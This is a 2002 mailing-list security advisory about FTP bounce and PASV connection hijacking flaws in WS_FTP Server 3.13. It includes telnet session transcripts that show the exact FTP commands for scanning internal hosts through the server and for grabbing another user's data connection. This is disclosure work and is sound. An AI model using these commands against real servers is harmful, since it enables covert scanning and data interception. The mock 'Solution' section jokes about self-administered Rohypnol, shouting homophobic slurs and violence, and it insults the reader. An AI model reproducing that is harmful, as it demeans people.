-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Product: IPSwitch, Inc. WS_FTP Server Versions: v3.13 (dated 2002.08.07), possibly others. Severity: Medium-Hot Author: low halo <lowhaloat_private> Date: October 25th, 2002 Revision: 1.0 { Overview } WS_FTP v3.13 by IPSwitch, Inc., is vulnerable to the classic FTP bounce attack as well as PASV connection hijacking. { Impact } The FTP bounce vulnerability allows a remote attacker to cause the FTP server to create a connection to any IP address on any TCP port greater than 1024. Thus, the attacker can scan Internet addresses anonymously along with any internal addresses that the FTP server has access to. More information on this vulnerability can be found here: http://www.cert.org/advisories/CA-1997-27.html. The PASV connection hijacking vulnerability allows a remote attacker to intercept directory listings and file downloads from other users; file uploads may also be spoofed. No authentication is necessary to execute this attack. More information on this vulnerability can be found here: http://www.kb.cert.org/vuls/id/2558. { Details } This demonstrates the FTP bounce vulnerability. The internal IP address, "192.168.1.20", is listening on port 8080, and "192.168.2.30" is dead or not accessible via port 8080: $ telnet x.ternal.ip.address 21 Trying x.ternal.ip.address... Connected to x.ternal.ip.address. Escape character is '^]'. 220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696) 220-Sun Jun 04 00:00:00 1989 220-27 days remaining on evaluation. 220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969) USER lowhalo 331 Password required PASS el_ach 230 user logged in PORT 192,168,1,20,31,144 200 command successful LIST 150 Opening ASCII data connection for directory listing 226 transfer complete PORT 192,168,2,30,31,144 200 command successful LIST 425 Can't open data connection. This demonstrates the PASV connection hijacking vulnerability: $ telnet x.x.x.x 21 Trying x.x.x.x... Connected to x.x.x.x. Escape character is '^]'. 220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696) 220-Sun Jun 04 00:00:00 1989 220-27 days remaining on evaluation. 220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969) USER lowhalo 331 Password required PASS el_ach 230 user logged in PASV 227 Entering Passive Mode (192,168,1,1,4,23). LIST 150 Opening ASCII data connection for directory listing Next, from another IP address: $ telnet x.x.x.x 1047 Trying x.x.x.x... Connected to x.x.x.x. Escape character is '^]'. drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 . drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 .. - -rwxr-x--- 1 lowhalo System 1337 Jan 0 00:00 lh Connection closed by foreign host. { Solution } 1.) Mix yourself a Long Island Iced Tea. 2.) Buy more Rohypnol from Paco on 7th & 30th ('cuz you used up the box you bought last time to get yourself out of that chicken- suit bind last Wednesday, remember??). 3.) While you're not looking, slip yourself two (2) crushed 100mg pills. 4.) Drink your Long Island while pretending to be flirting with someone in a bar environment (but in fact, you're still in your lonely, lonely apartment because you're a fucking looser and you're gonna die alone 28 years from now). 5.) Put on those crotchless leather pants that you got in your closet. But this time, don't wear anything underneath. Not even underwear. 6.) Go to the local gay bar, even though you're not gay, and wait outside 'till that warm fuzzy roofies feeling starts crawling up your back. 7.) Go inside the bar and look for the menacing black biker guy named Steve (Hey, how did you know his name is Steve if you're not gay, huh??). Take the deepest breath you can and scream at the top of your lungs every homosexual slur that you can think of right in the guy's face. 8.) Wake up 16 hours later at the bottom of a ditch in a pool of your own blood with that, "uh-oh, I think I forgot my jacket at the bar" feeling. 9.) Try to figure out exactly what happened, and LAUGH YOUR ASS OFF when you do. 10.) Die alone 28 years from now, you fucking looser. (Yeah, so anyways, IPSwitch never got back to me after two weeks, so there is no solution to this problem.) { Conclusion } A big huge shout-out goes to HACKTIVISMO (http://www.hacktivismo.com/)!! You guys have a lot to be proud of. And here's a quote I'd like all those iDEFENSE research contributors to read: "Few men have the virtue to withstand the highest bidder." - George Washington low halo <lowhaloat_private> Defender of Truth and Liberty http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9BFD99BF 58CE 3215 226A 69ED 4D20 4044 C925 54F9 9BFD 99BF -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.0 (GNU/Linux) iD8DBQE9uF67ySVU+Zv9mb8RAplZAJ0WhQbCfyjFWyNc8hfgIySKqFspBACeLFHb 8LkuAxTfsHywHMYA7SlCL8M= =G5ln -----END PGP SIGNATURE----- -- This message has been sent via an anonymous mail relay at www.no-id.com.
This archive was generated by hypermail 2b30 : Fri Oct 25 2002 - 09:17:46 PDT